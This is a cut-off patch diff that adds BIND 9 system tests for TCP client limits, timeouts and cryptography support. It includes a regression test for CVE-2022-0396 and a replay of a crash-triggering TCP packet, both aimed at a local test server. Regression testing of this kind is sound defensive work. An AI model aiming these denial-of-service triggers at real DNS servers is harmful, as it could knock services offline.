{ + send_command "close" "${1}" || return 1 +} + +# Check TCP connections are working normally before opening +# multiple connections +n=$((n + 1)) +echo_i "checking TCP query repsonse ($n)" +ret=0 +dig_with_opts +tcp @10.53.0.5 txt.example > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check TCP statistics after server startup before using them as a baseline for +# subsequent checks. +n=$((n + 1)) +echo_i "TCP high-water: check initial statistics ($n)" +ret=0 +refresh_tcp_stats +assert_int_equal "${TCP_CUR}" 0 "current TCP clients count" || ret=1 +# We compare initial tcp-highwater value with 1 because as part of the +# system test startup, the script start.pl executes dig to check if target +# named is running, and that increments tcp-quota by one. +assert_int_equal "${TCP_HIGH}" 1 "tcp-highwater count" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Ensure the TCP high-water statistic gets updated after some TCP connections +# are established. +n=$((n + 1)) +echo_i "TCP high-water: check value after some TCP connections are established ($n)" +ret=0 +OLD_TCP_CUR="${TCP_CUR}" +TCP_ADDED=9 +open_connections "${TCP_ADDED}" || ret=1 +check_stats_added() { + refresh_tcp_stats + assert_int_equal "${TCP_CUR}" $((OLD_TCP_CUR + TCP_ADDED)) "current TCP clients count" || return 1 + assert_int_equal "${TCP_HIGH}" $((OLD_TCP_CUR + TCP_ADDED)) "TCP high-water value" || return 1 +} +retry 2 check_stats_added || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Ensure the TCP high-water statistic remains unchanged after some TCP +# connections are closed. +n=$((n + 1)) +echo_i "TCP high-water: check value after some TCP connections are closed ($n)" +ret=0 +OLD_TCP_CUR="${TCP_CUR}" +OLD_TCP_HIGH="${TCP_HIGH}" +TCP_REMOVED=5 +close_connections "${TCP_REMOVED}" || ret=1 +check_stats_removed() { + refresh_tcp_stats + assert_int_equal "${TCP_CUR}" $((OLD_TCP_CUR - TCP_REMOVED)) "current TCP clients count" || return 1 + assert_int_equal "${TCP_HIGH}" "${OLD_TCP_HIGH}" "TCP high-water value" || return 1 +} +retry 2 check_stats_removed || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Ensure the TCP high-water statistic never exceeds the configured TCP clients +# limit. +n=$((n + 1)) +echo_i "TCP high-water: ensure tcp-clients is an upper bound ($n)" +ret=0 +open_connections $((TCP_LIMIT + 1)) || ret=1 +check_stats_limit() { + refresh_tcp_stats + assert_int_equal "${TCP_CUR}" "${TCP_LIMIT}" "current TCP clients count" || return 1 + assert_int_equal "${TCP_HIGH}" "${TCP_LIMIT}" "TCP high-water value" || return 1 +} +retry 2 check_stats_limit || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check TCP connections are working normally before opening +# multiple connections +n=$((n + 1)) +echo_i "checking TCP response recovery ($n)" +ret=0 +# "0" closes all connections +close_connections 0 || ret=1 +dig_with_opts +tcp @10.53.0.5 txt.example > dig.out.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +#################################################### +# NOTE: The next test resets the debug level to 1. # +#################################################### + +n=$((n + 1)) +echo_i "checking that BIND 9 doesn't crash on long TCP messages ($n)" +ret=0 +# Avoid logging useless information. +rndccmd 10.53.0.1 trace 1 || ret=1 +{ $PERL ../packet.pl -a "10.53.0.1" -p "${PORT}" -t tcp -r 300000 1996-alloc_dnsbuf-crash-test.pkt || ret=1 ; } | cat_i +dig_with_opts +tcp @10.53.0.1 txt.example > dig.out.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/tcp/tests_tcp.py b/bin/tests/system/tcp/tests_tcp.py new file mode 100644 index 0000000..3a0a7ae --- /dev/null +++ b/bin/tests/system/tcp/tests_tcp.py @@ -0,0 +1,70 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# pylint: disable=unused-variable + +import socket +import time + +import pytest + +pytest.importorskip("dns", minversion="2.0.0") +import dns.message +import dns.query + +TIMEOUT = 10 + + +def create_msg(qname, qtype, edns=-1): + msg = dns.message.make_query(qname, qtype, use_edns=edns) + return msg + + +def timeout(): + return time.time() + TIMEOUT + + +def create_socket(host, port): + sock = socket.create_connection((host, port), timeout=10) + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True) + return sock + + +# Regression test for CVE-2022-0396 +def test_close_wait(named_port): + with create_socket("10.53.0.7", named_port) as sock: + msg = create_msg("a.example.", "A") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + msg = dns.message.make_query("a.example.", "A", use_edns=0, payload=1232) + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # Shutdown the socket, but ignore the other side closing the socket + # first because we sent DNS message with EDNS0 + try: + sock.shutdown(socket.SHUT_RDWR) + except ConnectionError: + pass + except OSError: + pass + + # BIND allows one TCP client, the part above sends DNS messaage with EDNS0 + # after the first query. BIND should react adequately because of + # ns7/named.dropedns and close the socket, making room for the next + # request. If it gets stuck in CLOSE_WAIT state, there is no connection + # available for the query below and it will time out. + with create_socket("10.53.0.7", named_port) as sock: + msg = create_msg("a.example.", "A") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) diff --git a/bin/tests/system/testcrypto.sh b/bin/tests/system/testcrypto.sh new file mode 100755 index 0000000..020aa9a --- /dev/null +++ b/bin/tests/system/testcrypto.sh @@ -0,0 +1,98 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=${SYSTEMTESTTOP:=..} +prog=$0 +args="" +quiet=0 +dir="" +msg="cryptography" + +if test -z "$KEYGEN"; then + . $SYSTEMTESTTOP/conf.sh + alg="-a $DEFAULT_ALGORITHM -b $DEFAULT_BITS" +else + alg="" + quiet=1 + args="-q" +fi + +while test "$#" -gt 0; do + case $1 in + -q) + if test $quiet -eq 0; then + args="$args -q" + quiet=1 + fi + ;; + rsa|RSA|rsasha1|RSASHA1) + alg="-a RSASHA1" + msg="RSA cryptography" + ;; + rsasha256|RSASHA256) + alg="-a RSASHA256" + msg="RSA cryptography" + ;; + rsasha512|RSASHA512) + alg="-a RSASHA512" + msg="RSA cryptography" + ;; + ecdsa|ECDSA|ecdsap256sha256|ECDSAP256SHA256) + alg="-a ECDSAP256SHA256" + msg="ECDSA cryptography" + ;; + ecdsap384sha384|ECDSAP384SHA384) + alg="-a ECDSAP384SHA384" + msg="ECDSA cryptography" + ;; + eddsa|EDDSA|ed25519|ED25519) + alg="-a ED25519" + msg="EDDSA cryptography" + ;; + ed448|ED448) + alg="-a ED448" + msg="EDDSA cryptography" + ;; + *) + echo "${prog}: unknown argument" + exit 1 + ;; + esac + shift +done + +if test -z "$alg"; then + echo "${prog}: no algorithm selected" + exit 1 +fi + +if test -n "$TMPDIR"; then + dir=$(mktemp -d "$TMPDIR/XXXXXX") + args="$args -K $dir" +fi + +if $KEYGEN $args $alg foo > /dev/null 2>&1 +then + if test -z "$dir"; then + rm -f Kfoo* + else + rm -rf "$dir" + fi +else + if test $quiet -eq 0; then + echo_i "This test requires support for $msg" >&2 + echo_i "configure with --with-openssl, or --enable-native-pkcs11" \ + "--with-pkcs11" >&2 + fi + exit 255 +fi diff --git a/bin/tests/system/testsock.pl b/bin/tests/system/testsock.pl new file mode 100755 index 0000000..e9448ed --- /dev/null +++ b/bin/tests/system/testsock.pl @@ -0,0 +1,44 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Test whether the interfaces on 10.53.0.* are up. + +require 5.001; + +use Socket; +use Getopt::Long; + +my $port = 0; +my $id = 0; +GetOptions("p=i" => \$port, + "i=i" => \$id); + +my @ids; +if ($id != 0) { + @ids = ($id); +} else { + @ids = (1..8); +} + +foreach $id (@ids) { + my $addr = pack("C4", 10, 53, 0, $id); + my $sa = pack_sockaddr_in($port, $addr); + socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname("tcp")) + or die "$0: socket: $!\n"; + setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)); + + bind(SOCK, $sa) + or die sprintf("$0: bind(%s, %d): $!\n", + inet_ntoa($addr), $port); + close(SOCK); +} diff --git a/bin/tests/system/testsock6.pl b/bin/tests/system/testsock6.pl new file mode 100644 index 0000000..5903684 --- /dev/null +++ b/bin/tests/system/testsock6.pl @@ -0,0 +1,25 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +require 5.001; + +use IO::Socket::INET6; + +foreach $addr (@ARGV) { + my $sock; + $sock = IO::Socket::INET6->new(LocalAddr => $addr, + LocalPort => 0, + Proto => tcp) + or die "Can't bind : $@\n"; + close($sock); +} diff --git a/bin/tests/system/testsummary.sh b/bin/tests/system/testsummary.sh new file mode 100644 index 0000000..97b2716 --- /dev/null +++ b/bin/tests/system/testsummary.sh @@ -0,0 +1,86 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Creates the system tests output file from the various test.output.* files. It +# then searches that file and prints the number of tests passed, failed, not +# run. It also checks whether the IP addresses 10.53.0.[1-8] were set up and, +# if not, prints a warning. +# +# Usage: +# testsummary.sh [-n] +# +# -n Do NOT delete the individual test.output.* files after concatenating +# them into systests.output. +# +# Status return: +# 0 - no tests failed +# 1 - one or more tests failed + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + +keepfile=0 + +while getopts "n" flag; do + case $flag in + n) keepfile=1 ;; + esac +done + +if [ `ls test.output.* 2> /dev/null | wc -l` -eq 0 ]; then + echowarn "I:No 'test.output.*' files were found." + echowarn "I:Printing summary from pre-existing 'systests.output'." +else + cat test.output.* > systests.output + if [ $keepfile -eq 0 ]; then + rm -f test.output.* + fi +fi + +status=0 +echoinfo "I:System test result summary:" +echoinfo "`grep 'R:[a-z0-9_-][a-z0-9_-]*:[A-Z][A-Z]*' systests.output | cut -d':' -f3 | sort | uniq -c | sed -e 's/^/I:/'`" + +FAILED_TESTS=`grep 'R:[a-z0-9_-][a-z0-9_-]*:FAIL' systests.output | cut -d':' -f2 | sort | sed -e 's/^/I: /'` +if [ -n "${FAILED_TESTS}" ]; then + echoinfo "I:The following system tests failed:" + echoinfo "${FAILED_TESTS}" + status=1 +fi + +CRASHED_TESTS=$(find . \( -name 'core' -or -name 'core.*' -or -name '*.core' \) ! -name '*.txt' | cut -d'/' -f2 | sort -u | sed -e 's/^/I: /') +if [ -n "${CRASHED_TESTS}" ]; then + echoinfo "I:Core dumps were found for the following system tests:" + echoinfo "${CRASHED_TESTS}" +fi + +ASSERTION_FAILED_TESTS=`find . -name named.run | xargs grep "assertion failure" | cut -d'/' -f2 | sort -u | sed -e 's/^/I: /'` +if [ -n "${ASSERTION_FAILED_TESTS}" ]; then + echoinfo "I:Assertion failures were detected for the following system tests:" + echoinfo "${ASSERTION_FAILED_TESTS}" +fi + +TSAN_REPORT_TESTS=`find . -name 'tsan.*' | cut -d'/' -f2 | sort -u | sed -e 's/^/I: /'` +if [ -n "${TSAN_REPORT_TESTS}" ]; then + echoinfo "I:ThreadSanitizer reported issues for the following system tests:" + echoinfo "${TSAN_REPORT_TESTS}" +fi + +RESULTS_FOUND=`grep -c 'R:[a-z0-9_-][a-z0-9_-]*:[A-Z][A-Z]*' systests.output` +TESTS_RUN=`echo "${SUBDIRS}" | wc -w` +if [ "${RESULTS_FOUND}" -ne "${TESTS_RUN}" ]; then + echofail "I:Found ${RESULTS_FOUND} test results, but ${TESTS_RUN} tests were run" + status=1 +fi + +exit $status diff --git a/bin/tests/system/timeouts/clean.sh b/bin/tests/system/timeouts/clean.sh new file mode 100644 index 0000000..0da8a9c --- /dev/null +++ b/bin/tests/system/timeouts/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ./ns*/managed-keys.bind* +rm -f ./ns*/named.conf +rm -f ./ns*/named.lock +rm -f ./ns*/named.memstats +rm -f ./ns*/named.run* +rm -f ./ns*/named.stats +rm -rf ./__pycache__ +rm -f ./ns*/large.db diff --git a/bin/tests/system/timeouts/ns1/example.db b/bin/tests/system/timeouts/ns1/example.db new file mode 100644 index 0000000..cb321ff --- /dev/null +++ b/bin/tests/system/timeouts/ns1/example.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns1 +ns1 A 10.53.0.1 +@ A 10.53.0.1 +a A 10.53.0.1 +b A 10.53.0.1 +$INCLUDE large.db diff --git a/bin/tests/system/timeouts/ns1/named.args b/bin/tests/system/timeouts/ns1/named.args new file mode 100644 index 0000000..2df2be2 --- /dev/null +++ b/bin/tests/system/timeouts/ns1/named.args @@ -0,0 +1 @@ +-m record,size,mctx -c named.conf -d 1 -D timeouts-ns1 -X named.lock -g -T maxcachesize=2097152 diff --git a/bin/tests/system/timeouts/ns1/named.conf.in b/bin/tests/system/timeouts/ns1/named.conf.in new file mode 100644 index 0000000..4b422e2 --- /dev/null +++ b/bin/tests/system/timeouts/ns1/named.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; + tcp-initial-timeout 20; + tcp-idle-timeout 50; + tcp-keepalive-timeout 70; + max-transfer-time-out 5; /* minutes */ + max-transfer-idle-out 1; /* minutes */ +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example." { + type primary; + file "example.db"; + check-integrity no; +}; diff --git a/bin/tests/system/timeouts/ns1/root.db b/bin/tests/system/timeouts/ns1/root.db new file mode 100644 index 0000000..cb48acd --- /dev/null +++ b/bin/tests/system/timeouts/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.isc.org. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns1.example. +ns1.example. A 10.53.0.1 diff --git a/bin/tests/system/timeouts/prereq.sh b/bin/tests/system/timeouts/prereq.sh new file mode 100644 index 0000000..2204695 --- /dev/null +++ b/bin/tests/system/timeouts/prereq.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if [ "$($PYTHON -c "import dns.version; print(dns.version.MAJOR)" 2> /dev/null)" -ge 2 ] + then + : + else + echo_i "This test requires the dnspython >= 2.0.0 module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/timeouts/setup.sh b/bin/tests/system/timeouts/setup.sh new file mode 100644 index 0000000..65bb057 --- /dev/null +++ b/bin/tests/system/timeouts/setup.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +. ../conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf + +# +# Generate a large enough zone, so the transfer takes longer than +# tcp-initial-timeout interval +# +$PYTHON -c " +from __future__ import print_function +print('large IN TXT', end=' ') +for a in range(128): + print('\"%s\"' % ('A' * 240), end=' ') +print('') + +for a in range(150000): + print('%s IN NS a' % (a)) + print('%s IN NS b' % (a))" > ns1/large.db diff --git a/bin/tests/system/timeouts/tests_tcp_timeouts.py b/bin/tests/system/timeouts/tests_tcp_timeouts.py new file mode 100644 index 0000000..d3ee357 --- /dev/null +++ b/bin/tests/system/timeouts/tests_tcp_timeouts.py @@ -0,0 +1,284 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# pylint: disable=unused-variable + +import socket +import time + +import pytest + +pytest.importorskip("dns", minversion="2.0.0") +import dns.edns +import dns.message +import dns.name +import dns.query +import dns.rdataclass +import dns.rdatatype + +import pytest_custom_markers # pylint: disable=import-error + + +TIMEOUT = 10 + + +def create_msg(qname, qtype): + msg = dns.message.make_query( + qname, qtype, want_dnssec=True, use_edns=0, payload=4096 + ) + return msg + + +def timeout(): + return time.time() + TIMEOUT + + +def test_initial_timeout(named_port): + # + # The initial timeout is 2.5 seconds, so this should timeout + # + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + time.sleep(3) + + msg = create_msg("example.", "A") + + with pytest.raises(EOFError): + try: + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + except ConnectionError as e: + raise EOFError from e + + +def test_idle_timeout(named_port): + # + # The idle timeout is 5 seconds, so the third message should fail + # + msg = create_msg("example.", "A") + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + time.sleep(1) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(2) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(6) + + with pytest.raises(EOFError): + try: + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + except ConnectionError as e: + raise EOFError from e + + +def test_keepalive_timeout(named_port): + # + # Keepalive is 7 seconds, so the third message should succeed. + # + msg = create_msg("example.", "A") + kopt = dns.edns.GenericOption(11, b"\x00") + msg.use_edns(edns=True, payload=4096, options=[kopt]) + + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + time.sleep(1) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(2) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(6) + + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + +def test_pipelining_timeout(named_port): + # + # The pipelining should only timeout after the last message is received + # + msg = create_msg("example.", "A") + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + time.sleep(1) + + # Send and receive 25 DNS queries + for n in range(25): + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + for n in range(25): + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(3) + + # Send and receive 25 DNS queries + for n in range(25): + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + for n in range(25): + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + time.sleep(6) + + with pytest.raises(EOFError): + try: + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + except ConnectionError as e: + raise EOFError from e + + +def test_long_axfr(named_port): + # + # The timers should not fire during AXFR, thus the connection should not + # close abruptly + # + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + name = dns.name.from_text("example.") + msg = create_msg("example.", "AXFR") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # Receive the initial DNS message with SOA + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + assert soa is not None + + # Pull DNS message from wire until the second SOA is received + while True: + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + if soa is not None: + break + assert soa is not None + + +# This test relies on the maximum socket send buffer size (wmem_max) being set +# to 212992 bytes (the typical default value on Linux systems). Environments +# that use a different value for this setting (for example, FreeBSD defaults to +# 32768 bytes) may need their system-level settings to be tweaked in order for +# this test to pass. +@pytest_custom_markers.flaky(max_runs=3) +def test_send_timeout(named_port): + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + # Send and receive single large RDATA over TCP + msg = create_msg("large.example.", "TXT") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + + # Send and receive 28 large (~32k) DNS queries that should + # fill the default maximum 208k TCP send buffer + for n in range(28): + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # configure idle interval is 5 seconds, sleep 6 to make sure we are + # above the interval + time.sleep(6) + + with pytest.raises(EOFError): + try: + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + (response, rtime) = dns.query.receive_tcp(sock, timeout()) + except ConnectionError as e: + raise EOFError from e + + +@pytest_custom_markers.long_test +def test_max_transfer_idle_out(named_port): + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + name = dns.name.from_text("example.") + msg = create_msg("example.", "AXFR") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # Receive the initial DNS message with SOA + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + assert soa is not None + + time.sleep(61) # max-transfer-idle-out is 1 minute + + with pytest.raises(ConnectionResetError): + # Process queued TCP messages + while True: + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + if soa is not None: + break + assert soa is None + + +@pytest_custom_markers.long_test +def test_max_transfer_time_out(named_port): + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: + sock.connect(("10.53.0.1", named_port)) + + name = dns.name.from_text("example.") + msg = create_msg("example.", "AXFR") + (sbytes, stime) = dns.query.send_tcp(sock, msg, timeout()) + + # Receive the initial DNS message with SOA + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + assert soa is not None + + # The loop should timeout at the 5 minutes (max-transfer-time-out) + with pytest.raises(EOFError): + while True: + time.sleep(1) + (response, rtime) = dns.query.receive_tcp( + sock, timeout(), one_rr_per_rrset=True + ) + soa = response.get_rrset( + dns.message.ANSWER, name, dns.rdataclass.IN, dns.rdatatype.SOA + ) + if soa is not None: + break + assert soa is None diff --git a/bin/tests/system/tkey/Makefile.in b/bin/tests/system/tkey/Makefile.in new file mode 100644 index 0000000..1e62132 --- /dev/null +++ b/bin/tests/system/tkey/Makefile.in @@ -0,0 +1,55 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \ + ${OPENSSL_CFLAGS} + +CDEFINES = +CWARNINGS = + +DNSLIBS = ../../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@ +ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ + +DNSDEPLIBS = ../../../../lib/dns/libdns.@A@ +ISCDEPLIBS = ../../../../lib/isc/libisc.@A@ + +DEPLIBS = ${DNSDEPLIBS} ${ISCDEPLIBS} + +LIBS = ${DNSLIBS} ${ISCLIBS} @LIBS@ + +TARGETS = keycreate@EXEEXT@ keydelete@EXEEXT@ + +CREATEOBJS = keycreate.@O@ +DELETEOBJS = keydelete.@O@ + +SRCS = keycreate.c keydelete.c + +@BIND9_MAKE_RULES@ + +all: keycreate@EXEEXT@ keydelete@EXEEXT@ + +keycreate@EXEEXT@: ${CREATEOBJS} ${DEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${CREATEOBJS} ${LIBS} + +keydelete@EXEEXT@: ${DELETEOBJS} ${DEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${DELETEOBJS} ${LIBS} + +clean distclean:: + rm -f ${TARGETS} + diff --git a/bin/tests/system/tkey/clean.sh b/bin/tests/system/tkey/clean.sh new file mode 100644 index 0000000..ac54e79 --- /dev/null +++ b/bin/tests/system/tkey/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# 